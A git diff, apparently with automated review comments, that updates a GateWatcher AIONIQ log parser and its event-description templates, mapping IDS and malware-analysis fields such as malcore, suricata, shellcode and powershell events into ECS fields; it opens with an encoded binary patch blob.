zA|K&jdnst-x}ebAPZm<5_e8QOJ32aS@OdO?;;Eyg2Z6*QCwTg9;#Ad3X|{f2f*ucJ zvcgkiF)sYkwD=jYnA|n19Rgs)d6QWaq3hOKw`Nn%Fj|&LhMH>^J4VZ}?4gY@61|+; z<2_ksUcKvHBJ{j0YWcxzsIv`8^IAc}GwUt&%N=32-R!pGnYB;xT-!kn+X6_S9ikR; z+&>cH(bhjk!z8I}Nc?HZyo1}I7nYI1WL_8XAzSZ-phA1N->kn6bV$|J?R1xf$#fn= zx(|%f`!Z_d6BE|w*rRi3k5PDjCuVM+vQO;=rQh3yZB>oEoa6x1ugJEi-M1j?|1Eqm0ppmA*Qe7zkgdl z7$9I#Xyh)4w?i=f;&TJQW=cP!y4O3C=4$QD$^~o~xOw+14%8!|tI52mPpkeY+d~#7 
z11JvMfY%{MeOIoNa)0{nx^KTbQ*+LWflUe=Pk1DYROjc#oO?%B?3d}f@xCO*WhXc= zMg^*P);{EjWy`Sh{Jfy4@htv~(R@lVocn5LssiX2l0Q?bcvZ5pk8ybHmzV%giWk(< z?=60_b_=;}5&AJVb%!#{3-otUM?H@$(Pq2HH~>ctP0`9HJe9$W^~E&a(oiJx!-k#t z{2Hz>bF2Ezb?z|rjL+0qE!M>46%{I6;pD=uK0p!0CgEwXvR`h}raRzij(&#xv>$C{6Uhu`At;{2=XWk~v9{h)vVNJ43x~YByL)@-9V+6y z$N4fE1OH~F%MNavTtcJz%Ocf;BYm_V1fpCKJ6?jzEx$#oJS@LfNA)i^G-h&`zUrVd zAIV+fNWR=xYB=(~T8$^+`%@m(=Sxy7o5IGIIzDHUr?)hT1@@l6BTE+#F1Ii z37S4;z=xXX@)54U7Ti{XR$3amn66;g`*|y-M|%$f#n7kimsEz0wxX)1mTiBO#ZOcz zw`oK=&IpqQfnG*3b1 zF3lSP%c2V!&d~w?&xg;VJ-@}^-2T|Qv)X%E76GEvR>7lM?`Z@ZJ3FkRzK(=6uj#<% z%8o30g!W0Rjvk4qii&Z1^-fL0g$C>b+<)EFEOL$lyQ+N9HXF#l?v}r1P@u#65=(Eh z{+kVfO)Av%_b;6_xp1$Bb%RWmrjfx<&pC2(@=R4Gx3iiDR|4XX?()^}P3cG!)N{4k zCP)#~mgPDcDte4*OhEr}tlE)LP*70dw0+ngYqQ$?9yAjYcx=OkFC&C+Ocr>y@{<%! z=K3zQ$-%&yA9iY%Ja`L%Vm+?&^A*Q_mYk4(Su|1+5*_^jUUY_L>-WEg#{lD)o0gXs zC45}Lf&f%2!|>}cw~PkykMQUE(d32QoogOBx z!h6mkwjW*Y$LSoy8cB=#v&|b5x>ws*UO&yxj_e^7?)-8?Cri_Z9lF^&<7;Oq$B8T# z=12Ng_3;_^WpdT4!q4hfBZdDy!3~%!+*q24!v7>*b+%c9P^~+aMV~g>?g)6%Il?Zu zp*##9neP6}U^!`4SS6D6IHR(-O=@NFlvk=*}Xg*y)A5R_M@mVVU_>;~RKEmTb z?lKZ~9y4oIzc!tCOxs|Ixt)B~HH!F>6l>J8It;@}m3j%Gt7VUiQ^)g8mMh$E-(m>K zohN+Ja7gtGZnyGx3#D!U)(;&VnC=BUi_1*(_EP)+pxy)zcRI>5GTR^&Ou&4@g`+cuYRPiN8m;1cSjujIZ!%n}??#n?he zsb+PDyGGVKPiEQ$aka7Dr$bli9z{blx%~v9E<{%&BO``nYf#6Fq%^kwrGt+c8yicp zlRt5|$6egEV2is$kmV5fTyIY1oV#XpU7UuNmXMe@{%HTJ_s56JJQkC)vV(m_9MW=f z90CHRRLS0K=gWIwT`HeD*~4#78yY3`?;ji#VUB?{U6pp#Ps*S7rOZj)*<4-K8zyxw zeADd4WnJ(7La1IcPoW(*wuL~{-ah20VapRiB6#=!sE`T#&LIN>UBB&O=Y3+BSilkm z7*VChs83z?M`Z8Z`7mdj8gKOKRLWQ3F8kGzIIhf7)6ixza0DVw&!AG-T%~ys8qtxq zvbtWIE#kmP++~c``keAvm1c%!IUw0PlbGLTt5y;>{19&w`JGr{;RAB# zR%bf9ub!yqVo<(*Tz!yeMCRg|aBSoX!A_X+A<*S{%f0WEq_+3HV->e9b1szjexcm>@;VvD#hY_0tC zF>QsfPZ@RcT}`_(YZBej^a)}#Zrdc?qm{K=TF?9BY$JC|{CBD8 zBarbuitpL(rkxDCJ3h&r`kC5J%ZrnCbP}o7hK04#t_!$J6E*gX!M3b7Uv>Q9w5%9A zXI)gur^(ES&h=dJ#)4o+HE-+ZzlVvb2}&d-*$t33k?14w%6gmL?B|DL^KG0_1c9JMu<^k&Ax>h zLUZj)WET=6yF!vRvWMr)eZJ504?Mp<^W)5C-kN+s{AW$F|xK 
zEE`X|Symm~*|0uda(Ecjur-iDwHDL(dkP;jUfCiU{+d1EaIR#EFR{DKv;8!=C!Jb3 z>bfDZ1I`a95t|R+ ziIK{|rI$IX70P|ucYpf;<$ic}n^Z%_wC`Ma0e!2{M5k{0wxkJbiR?*ZjBN7_6bdEy zhZFm=@u%r4E^u^i^k`lf+NDxW=PB=(LJpAR<;!jxsr?W9zQ3cb+MW#fT<+(YCo4Cc z_wL5?^YSNks|)&FXO4e3QgB@g4s{T1!z>K%0&o*^CNl1qX=Jht&fz6Ffz3lqJ{zZT ze`ccy?GvY+*J&?pSMTl6jFH|Ok_g^$l)YrC`4O}I=wQy(D*8)vliEKM0gN9+44_hP zLNO0-3<|4`q#R329Hn0upV4gGc0~x!aE~K1OczX7x+@!hFz9eY`(v=+aH8ZsY`zie z0~eLVG7ftB?uoMb^^TREjZ&99r;3*wv;zJJWb+A;^9V$WBGxUhh zi-%oO_mZp~aNA8@K0XzYH3dmiY~$@x^75V2ao3Sn@^WZX%q72qiyM=_b2T><#8W$& zV$>IY{K$nP1C)Y=qqMy=$Fne`_Iv(xjj9>8y1!%t;JSzKeh%~AzGNGaGRvdJQ~U@6 z2R_at(WumGxJd{_Mas(~EoeV9RW)zq~^>ZHLfZ@E%=!r(oMTo4azE>N$6#XL_sFk0$U< za}8AmdXC!z-}Ilg2mQEfoTn#_e@98%fn%+&&+#ITuAbYnMAPAbq3Dtk z>DqL^QAKM=t%bPb?TO|o zuZ!G(+s^pgvC2+1N7UP%0wCjk<3E$0) zIh`m5^};2C4M>UYcpMr5{Ws0?%&VM+io#SAE=q-pT`)edY#4^LSYtprvQJD3a)*T&bSw(YsYx#`1*Of-}ZJ&$P z1+=uat)k^dt$N@8eYBs_o9l?db>+3@-J~&SexdD`RT69Cd|erL)D9K4}Vb|@Rx!a5@cLr^kZO9#S`vZMK4s4 zmFSjel(^PC1o@z9^EZ1azd5y4gr;RYKRaISlbrNww#RtegzLyDdDlc{UcwA9ew*xb zv=R_K8_IpnM5N^UFTUJ^k)!3lqw5IeZ5^dn0bbuEeW_bII(_I^*fy_%HNY1IHnx=5 z?E;*@E`AE3Tcxdb_eWP$lZ&mE(o&er$uPowo9G4F^zHn{##7Gpo{Hta>?@D2j=rS} zStz^&dIO6?Z#9~&{!xFF6vZyF4$^Q}c<5sgf$ym=VrA#&8N_Tv1P3o~#ekTWu?DN?5#IG{oX=IrQX9==Z_M&WmEkgh!BdgtRB$QU(2#vWKV@OT z(ciy@EwHX}1X?H@o<@L9=NO5K?N4_(c^%C26LRND9NiqS6%YCb04%DR#ON%d?Vq4K zHJ;}B7}^6Q1SsS&zEty_6|F+YgQ_n-@NvT*->{ae*hG)eFAdd)Z*~UDFE6a*7u0eY zUA?%o-9{C-I2L@YDY@c7X+U;K)@PBviNL;0UWdf%%{x=QU$XdnU&(8h`7RgUu#K+u zp0W7Df&oa8#?1}8uv-Rud6Cyef~W~krEJwr;ybqm9fOWK&1(UV6ICpp9e2*se5siy zB`tlz-u@(h*J#f8p^9z7GQu4Fnp8UMA&tLsW(`%!71e6<-bON|{0=zepFV!%8Eu_p zd97qsE2$n(S`;E|jJ6^N5e-91GudoZIXE~dpf}=tz@k{l?T(a3^AimJ1P?QpO5JzP zGqF2RRP}6*raIr=6I6NMP#9lNcd&uxVX&GAIZL;_`qtb$4S<1k->>dL2g5;Vs^Y_6 z$1dOA4u0q8#&`#J) z{O(1z`H2@N41>9?DZ3S-@pn`Pl*mYgtMDuv<5ZVqZwYV|y;3p2r%10`^E&a9iO@`y z?qvPsDIz3(F-NKkpBdmvsXn~lY8??)UMU%TcxTt}+AHg@rf4}SyNNw7=aD+d70HfS 
zA(b-v-oO|CD2PMP)x8-i#xZVw2>v)$b6;~V1Dusk0FzxCmwRom1%9p%^v~CIh!ylijdMA~t@?nz7upsJAgiV|)y7vY*tOm3w&lDleMb$(I$`F_RVz(6yZ=wfv= z_~%62+*R%GXl3KK3Y?v~FIdZ+u-g%sN|Lw4XeoLs`kniEmd@iM233ZeP+^>!DN;Ss ztf41bZY9ftW5(+I_7S_2t6Dbm*PlC5rAy=;{%ai}Gs?#i9Qx9%%5U$nQ~A z0nI)vMD&S@0YeJOvY3&?w5X@R7HSktOqHwfsxY0{`+ifIx=F5a^C9Fq_AGoV@PkV- zEoSza0AhEdo;Y7ng;qdKvWA~><8Q4r?29)A^cF=cM-RG}m{qeLSH>zIZ9rQWA2CRn zCFqyu+HdCIPRZ)j@?w%C?Mvm>znqX+zk$l-nRS;VVFXpVb%lygpR*lQaR!*rMRvaW zfzrG7pe@)p?x4jl9PT$B(IOi5>sO@}WO_dDTxF-FK_vYWPZLk9< z7g`q{V@xd}P=XeR$Cz{ga-45V?N3Y+GwzyOhmeiS*6r0Fk-j#!lrm;w-djSj&Qo_p zg;3fb$)L^56S{fjg|QoBs(yWa71!7Xf2nE$_E3;a2Z|6JR1A$hA+f_zm@Rp06m@u* zn(v$t`I9a`zu@w7W%>Fm+q36fEmO`^ABI0{WSH;Ev3cx%@^MY1PSwjPT3aZW*gyF4 zL}qPweV{^`w)rPLd`f?Wy40Xh7~xtDjxnai{Z&`~YVDPW)O>6)l2?>^X9or0iV0#V zcm{!Z(3@`UVe_PL!BIT6`s|zL9<4t_8s&XTOj_aYxpKAH#uKVm_w#xdc+5;V!)%J@ zDYLqc5W`kep5fA0yVjCyjhl+bhx^oo4H~k`_?yR&(dJ)MJ2Lxd>I~iX{9hZTPTD+j zX3KPb+$>Bmow=C6?=9TBYrAfS0yo_3(`v@vI?ntz8L8Xg;5zLj5k}8d_JRZ5}A6%B{!#@8`Is*Sx(q)+&DoL;hIWQdl;CZ_%Udv zjR6t36UuA1NG94zIYOS8tL+?1IeWiGcnv6WdtDJ(9J9=0#kltK@~}X6H>1@E;X0uL z8dqXx;(n$s>EwQ;$|_07wBZi$xGH)QA)zNh4?g(Wwa zTdZz;7hnV-@mr5<-z~h!TfMNo-}68zhLoUu#2b7g$nGiNLcQtN*{5%tw@F@=t17x+ z^D327@*|l{Q`Pql^8Acy?HR87tRQrUinb^k!*DbBtP`K7y3(ww#dEBNK*!9XoKG#a z!OUHuVk*a3Rof^O(oV`n()_fLQKn2=^T!dlQ)Am%E<9rLdL_3E@s=N z73OJaGWRR~-u`=|foMu)RMA$?rvMcHx3cx)(~|h6`X|@pvy^AOG&F$Zg9IF7KuF?U z`ZDXD)8g){?@a@HJ1ae^&E!djqO3_tuijrh4NYfQPlk2bZ$N?kEZt0fVMBX;v{J*D z@EitVTh8+lW+fbMV>ZcJ-x6-}?8NrjNkJYMO$1Hxk1lRy(cM1t3ooF>cO*n?H8tZR zFZ^pJ?w+cFtA3kVxKm&QTcq2TZVK?)owhwy__Fp(U2*XXl`IYL>C(8D0jay5~4+-M3_^WpuRq&6^k5qO`QM42tA}NPi|`pq0u;Zp@rn$@G^Eb}YVJG3Ev_fZ#!Rh zA7pSPW9*nRNCtS(YMb7{ol+{Dr`0@#+(Bb~8FVL@Vp}gIc0=8>E}qMc@n@r20V#ms zEV}wiljvMc$nCMqsUIjn+%?5J)@_Q`#uxo_gzbkae!Cga8Gjp9G@M+%@^;n(D%o;{ zqew?T40u->iouswEs8rF?0zz+!pdx{tL#$cF9h;~FDDDzb;kJNi4qa@r*n$WtN9om_NStuJ$`=?9oji=}=kT5JNFLo_9sm%EaGr2_qStnVKV?v$gn{ z-xhq@N9PGvqrMAVq0#&hp(sE-qbSa#0$m;Jx*iJkWDVJ0oNVZEeNg=6*tg|je~!;= 
zE4NW77gOF8vbg47%PPh!ZAn44J>D=y+~`njZQ;SK6Qah#MRuL><>YT6<_@!=*uikv z*ZHXW7gXq?)s?Us4Bu4+I0X4l8naxz6T^-Z9*pHG*;BEI7?cbXHNHX~HE)`~`_0!$enfBzq}bYXJq zH}1`-32OMkYE|-YCp_&cc3N(pC>27Mvs(NG@3nJczdh6+B*tt^{m4NuRG%(PwD20| zE*~Ky zr&tjuXzHR(u*huODLnz1<{M5=B<&kvl`?e-E0^!a*u|v)QDs}sRj~WA_+FaL!$Q{& z=I^p?OLPJJ$V!!EmBL$-K}5x-_7?L7z$^yM)O9Kc%x8` z^9!F>=ebXm@z4^nrqvW~Z{FtD{E+}t)fa;oglBqZ$sBiWBzHIc<7S8)=-=yq>+Q${ z#A>0Y#pM36@dz`KVRYi9A@!LWZ!7iC7+_J~YEyWY$L6J!*=ePVF3I7H~Ho{**; z8<3c7PR*)v%RJI7%R8%sy6z1LJTkGYl7mxS$M5y3{Sx5v>^1#P zmTIcfqD=*u4fPr|%*I2Nf`d^n569CCgVTW>mkATasl6d9#hMP8aDfOXs3}t(>xPKi zC6weXx8}#k4qsE_Zhjh7W4ptzIeVor?4p;G#M%h}H(Kv?uoxp@bgyj6G>ln*p5-WT z=bX%VDn0UWr;wT&cu`2;L6f|{tPHahdV_kfAV~CT)U#p#VQxp=UcUwnuIaV;MHar& zupL$>{@Y#9rR$1$?R8@kE;vrQps zI7kx<3ugJs^nG~!lTG07pEPO-8C!OdPv4)buoU1G{L62=Yv{@eQQR7k|7pknN}k4n z@Ba#3j5Z7{{N;Z%I#+%3i$N)cXUsR?hoY}BfuEn7U_CIv?|R%R@SEXIQTFWw4g5d{ zZS`Xczx7Ce*XZVU0mDTz8G)~bPA83#vdt#@tZQdw*0Vlt&V&~?#DT2JWhzpBIJfZ( zTwr>KMgxJa85gHjbQ4P;5qO-dcnFb*Rm9f0oMjEQ?y#_z5ftxU1k?v}r0I!T}!{My^wz*+eG@VxLCdG!1ndhk{6Q?xzT1xTy+;H_n`J!OwWda3bi z=4u;bGTMnwL7!efV7)$jkZE{CW;r=`-MTH_O?;jNXaSY`47l0xgg_b#N&MIm5%%w}<%s1@7TgIA z+bzs&OWisw4?BK5Oq97=+_uMJ`qp$_T%sO>#c}@_$$(}HELLBcGH$-#KB<95fqCV2 zf;q3trW3_(;5b3qu;VPQvn?-VwCT%ueMd12D~x_(kaRI{kwB___=xkLmEi>XeR($A zs2!0ZfDWm*NFZT|q<|JJl%{ir*H|_Z8D)RA9A#H%gvlr;H=MD*R&!^cNYZ(FpzuuN z(HoGD@<9TrZ*26WX$x3+Yh_oYo+Sa!RgS+SYty^O4mF4{(}kcrSa5vCa?bTUPSGh- zO2y<%?C}m^Si8rYp-(D-?I!zypZg-PgUZEmLdfn`lhleYF@fj)0g*&@1HVuSY37Fq zCi?`?`VJ}3TU`I=X;bW~5y%%V4rr+HoiNsB+Vw`(nK;3{H7taT0c}SWJu$Cg`#MYj zyQ6Vd7yecBHH_%P#$2*xOrlZym-rg!a=AuJ%x5Q{vOYghxzNM{jp_5EPJmZw41rkT ziXN0sl#=@XeL|k{1cwFv&q#{J_K*fk10QNDVk=z$GbNd2lQLTX%Md^q_)x)HAuES2 z1PFq~Y9Rjed?u_CiDZEt@ZXdjSirx>z5oB$|2vrum7xIsp`l{?a|C>DscEB1RIHx- E7i6}*$p8QV diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json index 547bcc82e..6ef36657f 100644 --- a/GateWatcher/aioniq/_meta/smart-descriptions.json 
+++ b/GateWatcher/aioniq/_meta/smart-descriptions.json
@@ -1,14 +1,14 @@
 [
 {
- "value": "Infected payload {file.name} hosted on {url.domain} was blocked: {gatewatcher.malcore.detail_threat_found}",
+ "value": "{gatewatcher.event_type} checker: {gatewatcher.state} file: {file.name} hosted on {url.domain} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
 "conditions": [
 {
- "field": "gatewatcher.type",
- "value": "malcore"
+ "field": "gatewatcher.event_type",
+ "value": "malware"
 },
 {
- "field": "gatewatcher.state",
- "value": "Infected"
+ "field": "gatewatcher.type",
+ "value": "malcore"
 },
 {
 "field": "url.domain"
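Review bot: The new malcore template interpolates `{gatewatcher.state}`, `{source.ip}`, `{source.port}`, `{destination.ip}` and `{destination.port}`, yet the `conditions` array only requires `gatewatcher.event_type`, `gatewatcher.type`, `url.domain` and the fields that continue past this hunk (lines 15–17 are not shown); an event that lacks one of the uninterpolated fields will presumably render with an empty slot such as `( ->  :)`. Either add a presence condition per placeholder, e.g. `{ "field": "source.ip" }, { "field": "destination.ip" }`, or drop the placeholders that are not guaranteed. The same template-versus-conditions mismatch applies to every entry in the `@@ -18,79 +18,69 @@` hunk, where `source.ip`, `destination.ip`, `network.protocol`, `rule.name`, `gatewatcher.state` and `gatewatcher.sub_type` are used with conditions only on `gatewatcher.event_type` and `gatewatcher.type`.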
@@ -18,79 +18,69 @@ }, { "field": "source.address" - }, - { - "field": "gatewatcher.malcore.detail_threat_found" - } - ], - "relationships": [ - { - "source": "source.address", - "target": "url.domain", - "type": "connection was denied" - }, - { - "source": "url.domain", - "target": "file.name", - "type": "host infected payload" } ] }, { - "value": "Alert {rule.name} raised with severity {event.severity}", + "value": "GCenter stats", "conditions": [ { - "field": "event.kind", - "value": "alert" - }, - { - "field": "event.severity" - }, - { - "field": "rule.name" + "field": "gatewatcher.event_type", + "value": "stats" } - ] - }, - { - "value": "{file.name} originating from {url.domain} analyzed", + ] + }, + { + "value": "Metadata: {gatewatcher.event_type} {source.ip}:{source.port} -> {destination.ip}:{destination.port}", "conditions": [ { - "field": "gatewatcher.event_type", - "value": "fileinfo" - }, + "field": "gatewatcher.type", + "value": "suricata" + } + ] + }, + { + "value": "Metadata: {gatewatcher.event_type} on {network.protocol}: {file.name} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})", + "conditions": [ { - "field": "url.domain" + "field": "gatewatcher.type", + "value": "suricata" }, { - "field": "file.name" + "field": "gatewatcher.event_type", + "value": "fileinfo" } - ] - }, - { - "value": "{gatewatcher.event_type} connection from {source.address} to {url.domain}", + ] + }, + { + "value": "{gatewatcher.type} alert {rule.name} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})", "conditions": [ { "field": "gatewatcher.event_type", - "value": "http" - }, - { - "field": "url.domain" + "value": "alert" }, { - "field": "source.address" + "field": "gatewatcher.type", + "value": "suricata" } - ], - "relationships": [ + ] + }, + { + "value": "{gatewatcher.event_type} {gatewatcher.state} of type {gatewatcher.sub_type} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})", + 
"conditions": [ { - "source": "source.address", - "target": "url.domain", - "type": "connected to" - }, + "field": "gatewatcher.event_type", + "value": "shellcode" + } + ] + }, + { + "value": "{gatewatcher.event_type} {gatewatcher.state} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})", + "conditions": [ { - "source": "url.domain", - "target": "destination.address", - "type": "was resolved to" + "field": "gatewatcher.event_type", + "value": "powershell" } - ] - } + ] + } ] diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 068d97e08..58f96e058 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
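Review bot: The generic `"Metadata: {gatewatcher.event_type} {source.ip}:{source.port} -> ..."` entry has `gatewatcher.type == "suricata"` as its only condition and sits before the `fileinfo` and `alert` entries, which also require `gatewatcher.type == "suricata"` and add a second condition; if the matcher selects the first satisfied entry, those two more specific descriptions are never used. Moving the generic entry below the `fileinfo` and `alert` entries, or giving it a discriminating `gatewatcher.event_type` condition, keeps the specific descriptions reachable. Whether evaluation is first-match or most-specific is not visible in this file, so confirm against the renderer before reordering.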
@@ -1,109 +1,243 @@ -name: aioniq +name: gatewatcher-aioniq-legacy-format +ignored_values: null pipeline: - name: json_load + description: '' + filter: '' external: name: json.parse-json + properties: + input_field: '{{original.message}}' + output_field: message - name: parsed_date + description: '' + filter: '' external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: '{{json_load.message.timestamp_analyzed}}' output_field: datetime + format: null + timezone: UTC - name: common + description: '' + filter: '' + external: null - name: malcore + description: '' filter: '{{json_load.message.type == "malcore"}}' + external: null - name: suricata + description: '' filter: '{{json_load.message.type == "suricata"}}' - + external: null + - name: powershell + description: powershell + filter: '' + external: null + - name: shellcode + description: shellcode + filter: '' + external: null + - name: fileinfo + description: fileinfo + filter: '' + external: null + - name: dga + description: DGA + filter: '' + external: null + - name: retrohunt + description: Retrohunt + filter: '' + external: null stages: common: actions: - set: - source.ip: "{{json_load.message.src_ip}}" - filter: "{{json_load.message.src_ip | is_ipaddress}}" - + source.ip: '{{json_load.message.src_ip}}' + filter: '{{json_load.message.src_ip | is_ipaddress}}' + name: set - set: - destination.ip: "{{json_load.message.dest_ip}}" - filter: "{{json_load.message.dest_ip | is_ipaddress}}" - + destination.ip: '{{json_load.message.dest_ip}}' + filter: '{{json_load.message.dest_ip | is_ipaddress}}' + name: set - set: - "@timestamp": "{{parsed_date.datetime}}" - source.port: "{{json_load.message.src_port}}" - destination.port: "{{json_load.message.dest_port}}" - observer.name: "{{json_load.message.gcap}}" - observer.version: "0.2" - observer.hostname: "{{json_load.message.host}}" - observer.type: "firewall" - network.transport: "{{json_load.message.proto}}" - 
network.protocol: "{{json_load.message.app_proto}}" - gatewatcher.type: "{{json_load.message.type}}" - gatewatcher.state: "{{json_load.message.state}}" - gatewatcher.gcenter: "{{json_load.message.gcenter}}" - gatewatcher.gcap: "{{json_load.message.gcap}}" - gatewatcher.flow_id: "{{json_load.message.flow_id}}" - gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}" - gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}" - gatewatcher.event_type: "{{json_load.message.event_type}}" - event.category: ["network"] - event.type: ["info"] - event.severity: "{{json_load.message.severity}}" + '@timestamp': '{{parsed_date.datetime}}' + source.port: '{{json_load.message.src_port}}' + observer.name: '{{json_load.message.gcap}}' + observer.type: ids + event.category: + - network + event.severity: '{{json_load.message.severity}}' + destination.port: '{{json_load.message.dest_port}}' + gatewatcher.gcap: '{{json_load.message.gcap}}' + gatewatcher.type: '{{json_load.message.type}}' + network.protocol: '{{json_load.message.app_proto}}' + observer.version: '0.2' + gatewatcher.state: '{{json_load.message.state}}' + gatewatcher.stats: '{{json_load.message.stats}}' + network.transport: '{{json_load.message.proto}}' + observer.hostname: '{{json_load.message.host}}' + gatewatcher.flow_id: '{{json_load.message.flow_id}}' + gatewatcher.gcenter: '{{json_load.message.gcenter}}' + gatewatcher.payload: '{{json_load.message.payload}}' + gatewatcher.event_type: '{{json_load.message.event_type}}' + gatewatcher.payload_printable: '{{json_load.message.payload_printable}}' + gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}' + gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}' + filter: '' + name: set - set: - observer.mac: '["{{json_load.message.ether.src_mac}}", "{{json_load.message.ether.dest_mac}}"]' - filter: "{{json_load.message.ether != null}}" - - name: translate - dictionary: - alert: alert - mapping: - 
gatewatcher.event_type: event.kind - fallback: event - + observer.mac: >- + ["{{json_load.message.ether.src_mac}}", + "{{json_load.message.ether.dest_mac}}"] + filter: '{{json_load.message.ether != null}}' + name: set malcore: actions: - set: - file.name: "{{json_load.message.fileinfo.filename}}" - file.size: "{{json_load.message.fileinfo.size}}" - file.hash.md5: "{{json_load.message.fileinfo.md5}}" - file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" - url.path: "{{json_load.message.http.url}}" - url.domain: "{{json_load.message.http.hostname}}" - http.version: "{{json_load.message.http.version}}" - http.request.method: "{{json_load.message.http.http_method}}" - user_agent.original: "{{json_load.message.http.http_user_agent}}" - http.response.status_code: "{{json_load.message.http.status}}" - gatewatcher.retroact: "{{json_load.message.retroact}}" - gatewatcher.nb_rescans: "{{json_load.message.nb_rescans}}" - gatewatcher.malcore.code: "{{json_load.message.code|string}}" - gatewatcher.malcore.file: "{{json_load.message.file}}" - gatewatcher.malcore.magic: "{{json_load.message.magic}}" - gatewatcher.malcore.replica: "{{json_load.message.replica}}" - gatewatcher.reporting_token: "{{json_load.message.reporting_token}}" - gatewatcher.malcore.detail_threat_found: "{{json_load.message.detail_threat_found}}" - event.category: ["malware"] - event.type: ["info"] - + url.path: '{{json_load.message.http.url}}' + file.name: '{{json_load.message.fileinfo.filename}}' + file.size: '{{json_load.message.fileinfo.size}}' + event.type: + - info + url.domain: '{{json_load.message.http.hostname}}' + http.version: '{{json_load.message.http.version}}' + file.hash.md5: '{{json_load.message.fileinfo.md5}}' + event.category: + - malware + file.hash.sha256: '{{json_load.message.fileinfo.sha256}}' + http.request.method: '{{json_load.message.http.http_method}}' + user_agent.original: '{{json_load.message.http.http_user_agent}}' + gatewatcher.fileinfo: '{{json_load.message.fileinfo}}' + 
gatewatcher.retroact: '{{json_load.message.retroact}}' + gatewatcher.nb_rescans: '{{json_load.message.nb_rescans}}' + gatewatcher.malcore.code: '{{json_load.message.code|string}}' + gatewatcher.malcore.file: '{{json_load.message.file}}' + gatewatcher.malcore.magic: '{{json_load.message.magic}}' + http.response.status_code: '{{json_load.message.http.status}}' + gatewatcher.malcore.replica: '{{json_load.message.replica}}' + gatewatcher.reporting_token: '{{json_load.message.reporting_token}}' + gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}' + filter: '' + name: set suricata: actions: - set: - source.bytes: "{{json_load.message.flow.bytes_toserver}}" - source.packets: "{{json_load.message.flow.pkts_toserver}}" - destination.bytes: "{{json_load.message.flow.bytes_toclient}}" - destination.packets: "{{json_load.message.flow.pkts_toclient}}" - url.path: "{{json_load.message.http.url}}" - url.domain: "{{json_load.message.http.hostname}}" - http.version: "{{json_load.message.http.version}}" - http.request.method: "{{json_load.message.http.http_method}}" - user_agent.original: "{{json_load.message.http.http_user_agent}}" - http.response.status_code: "{{json_load.message.http.status}}" - dns.id: "{{json_load.message.dns.id}}" - dns.type: "{{json_load.message.dns.type}}" - dns.question.name: "{{json_load.message.dns.rrname}}" - dns.question.type: "{{json_load.message.dns.rrtype}}" - rule.name: "{{json_load.message.alert.signature}}" - rule.id: "{{json_load.message.alert.signature_id|string}}" - rule.version: "{{json_load.message.alert.rule.version}}" - rule.category: "{{json_load.message.alert.category}}" - event.action: "{{json_load.message.alert.action}}" - file.name: "{{json_load.message.fileinfo.filename}}" - file.size: "{{json_load.message.fileinfo.size}}" - file.hash.md5: "{{json_load.message.fileinfo.md5}}" - file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" + dns.id: '{{json_load.message.dns.id}}' + rule.id: 
'{{json_load.message.alert.signature_id|string}}' + dns.type: '{{json_load.message.dns.type}}' + url.path: '{{json_load.message.http.url}}' + file.name: '{{json_load.message.fileinfo.filename}}' + file.size: '{{json_load.message.fileinfo.size}}' + rule.name: '{{json_load.message.alert.signature}}' + url.domain: '{{json_load.message.http.hostname}}' + event.action: '{{json_load.message.alert.action}}' + http.version: '{{json_load.message.http.version}}' + rule.version: '{{json_load.message.alert.rule.version}}' + source.bytes: '{{json_load.message.flow.bytes_toserver}}' + file.hash.md5: '{{json_load.message.fileinfo.md5}}' + rule.category: '{{json_load.message.alert.category}}' + source.packets: '{{json_load.message.flow.pkts_toserver}}' + gatewatcher.ftp: '{{json_load.message.ftp}}' + gatewatcher.nfs: '{{json_load.message.nfs}}' + gatewatcher.rdp: '{{json_load.message.rdp}}' + gatewatcher.rfb: '{{json_load.message.rfb}}' + gatewatcher.rpc: '{{json_load.message.rpc}}' + gatewatcher.sip: '{{json_load.message.sip}}' + gatewatcher.smb: '{{json_load.message.smb}}' + gatewatcher.ssh: '{{json_load.message.ssh}}' + gatewatcher.tls: '{{json_load.message.tls}}' + file.hash.sha256: '{{json_load.message.fileinfo.sha256}}' + gatewatcher.dhcp: '{{json_load.message.dhcp}}' + gatewatcher.dnp3: '{{json_load.message.dnp3}}' + gatewatcher.krb5: '{{json_load.message.krb5}}' + gatewatcher.mqtt: '{{json_load.message.mqtt}}' + gatewatcher.smtp: '{{json_load.message.smtp}}' + gatewatcher.snmp: '{{json_load.message.snmp}}' + gatewatcher.tftp: '{{json_load.message.tftp}}' + destination.bytes: '{{json_load.message.flow.bytes_toclient}}' + dns.question.name: '{{json_load.message.dns.rrname}}' + dns.question.type: '{{json_load.message.dns.rrtype}}' + gatewatcher.http2: '{{json_load.message.http.http2}}' + gatewatcher.ikev2: '{{json_load.message.ikev2}}' + destination.packets: '{{json_load.message.flow.pkts_toclient}}' + http.request.method: '{{json_load.message.http.http_method}}' + 
user_agent.original: '{{json_load.message.http.http_user_agent}}' + gatewatcher.ftp_data: '{{json_load.message.ftp_data}}' + gatewatcher.smtp_email: '{{json_load.message.email}}' + http.response.status_code: '{{json_load.message.http.status}}' + filter: '' + name: set + powershell: + actions: + - set: + event.module: '{{json_load.message.sub_type}}' + gatewatcher.sample_id: '{{json_load.message.file_id}}' + gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}' + gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}' + gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}' + filter: '' + name: set + shellcode: + actions: + - set: + event.module: '{{json_load.message.event_type}}' + gatewatcher.calls: '{{json_load.message.calls}}' + gatewatcher.encodings: 